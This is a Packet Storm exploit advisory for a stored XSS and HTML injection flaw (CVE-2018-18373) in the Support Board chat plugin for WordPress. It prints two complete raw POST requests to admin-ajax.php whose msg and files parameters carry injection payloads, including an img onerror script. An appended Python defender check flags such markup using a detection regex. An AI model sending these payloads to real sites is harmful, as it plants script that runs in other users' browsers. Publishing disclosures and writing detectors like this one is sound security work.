packetstorm | Ismail Tasdelen | PACKETSTORM:149806
History: Oct 16, 2018 - 12:00 a.m.

WordPress Support Board 1.2.3 Cross Site Scripting

2018-10-16 00:00:00
Ismail Tasdelen
packetstormsecurity.com

EPSS: 0.001

Percentile: 20.2%

`# Exploit Title: Support Board - PHP & Wordpress Plugin v1.2.3 - HTML Injection and Stored XSS  
# Date: 2018-10-16  
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://schiocco.com/  
# Software Link : https://board.support/  
# Software : Support Board - Chat And Help Desk  
# Version : v1.2.3  
# Vulnerability Type : Code Injection  
# Vulnerability : HTML Injection and Stored XSS  
# CVE : CVE-2018-18373  
  
# In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress, a Stored XSS vulnerability has been discovered in file upload areas in the Chat and Help Desk sections via the msg parameter in a /wp-admin/admin-ajax.php sb_ajax_add_message action.  
  
  
# HTTP POST Request : [HTML Injection]  
  
POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://TARGET/desk-demo/  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 288  
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77  
Connection: close  
  
action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=  
  
# In v1.2.3 of the Schiocco Support Board - Chat And Help Desk PHP & WordPress plugin, HTML Injection and Stored XSS vulnerabilities have been discovered in the file upload areas of the Chat and Help Desk sections.  
  
# HTTP POST Request : [Stored XSS]  
  
POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://TARGET/chat/  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 450  
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77  
Connection: close  
  
action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=  
  
`
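
A defender-side check for the two requests above, as an added example that is not part of the original advisory: it decodes a urlencoded `admin-ajax.php` POST body and flags `sb_ajax_add_message` submissions whose `msg` or `files` values contain markup once URL and HTML-entity encoding are undone. The function names, the regex heuristics and the sample bodies are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Fields of the sb_ajax_add_message action that the advisory shows carrying markup.
WATCHED_FIELDS = ("msg", "files")

# Heuristic (assumption): a tag opener, an inline event handler, or a javascript: URL.
MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z!]|\bon[a-z]+\s*=|javascript\s*:", re.I)


def decode_layers(value, max_rounds=3):
    """Undo HTML-entity encoding repeatedly so double-encoded markup is visible."""
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_body(body):
    """Return {field: [offending values]} for one urlencoded admin-ajax.php POST body."""
    params = parse_qs(body, keep_blank_values=True)
    if "sb_ajax_add_message" not in params.get("action", []):
        return {}
    findings = {}
    for field in WATCHED_FIELDS:
        for raw in params.get(field, []):
            # "files" is a pipe-separated list of upload URLs in the advisory's request.
            parts = raw.split("|") if field == "files" else [raw]
            bad = [p for p in parts if MARKUP.search(decode_layers(p))]
            if bad:
                findings.setdefault(field, []).extend(bad)
    return findings


# Constructed sample bodies, modelled on the two requests above (not captured traffic).
SAMPLES = {
    "benign": "action=sb_ajax_add_message&msg=Hello+there&files=&user_type=user",
    "html_in_msg": "action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3Etest%3C%2Fh1%3E&files=",
    "handler_in_files": "action=sb_ajax_add_message&msg=&files=https%3A%2F%2Fexample.test%2Fa%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E.jpg%7Chttps%3A%2F%2Fexample.test%2Fb.jpg",
    "other_action": "action=heartbeat&msg=%3Cb%3Ex%3C%2Fb%3E",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_body(body))
```

The same decode-then-match logic can run over request bodies captured by a WAF or reverse proxy; it is a triage heuristic and does not replace output encoding in the plugin itself.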
